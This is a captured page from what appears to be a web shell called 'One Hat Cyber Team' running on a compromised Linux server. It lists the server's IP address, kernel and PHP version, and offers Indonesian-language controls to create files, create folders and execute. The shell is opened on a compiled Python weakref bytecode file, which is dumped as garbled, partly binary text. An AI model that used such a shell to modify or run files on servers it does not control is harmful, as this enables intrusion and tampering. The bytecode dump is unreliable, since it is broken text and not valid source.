⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.91
Server IP:
57.129.66.90
Server:
Linux vps-7f548908 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.27
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
snap
/
core20
/
2682
/
usr
/
lib
/
python3.8
/
__pycache__
/
Edit File: weakref.cpython-38.pyc
U >hS @ s d Z ddlmZmZmZmZmZmZmZm Z ddl mZmZ ddl Z ddlZddlZeefZddddd d ddd ddddg ZG dd deZG dd de jZG dd deZG dd d e jZG dd dZdS )z{Weak reference support for Python. This module is an implementation of PEP 205: http://www.python.org/dev/peps/pep-0205/ )getweakrefcountgetweakrefsrefproxyCallableProxyType ProxyType ReferenceType_remove_dead_weakref)WeakSet_IterationGuardNr r r r WeakKeyDictionaryr r r ProxyTypesWeakValueDictionaryr WeakMethodfinalizec sD e Zd ZdZdZdddZ fddZdd Zd d Ze j Z ZS ) r z A custom `weakref.ref` subclass which simulates a weak reference to a bound method, working around the lifetime problem of bound methods. ) _func_ref _meth_type_alive__weakref__Nc s~ z|j }|j}W n( tk r8 tdt|d Y nX fdd}t| ||}t|||_t||_ d|_ t||S )Nz)argument should be a bound method, not {}c s&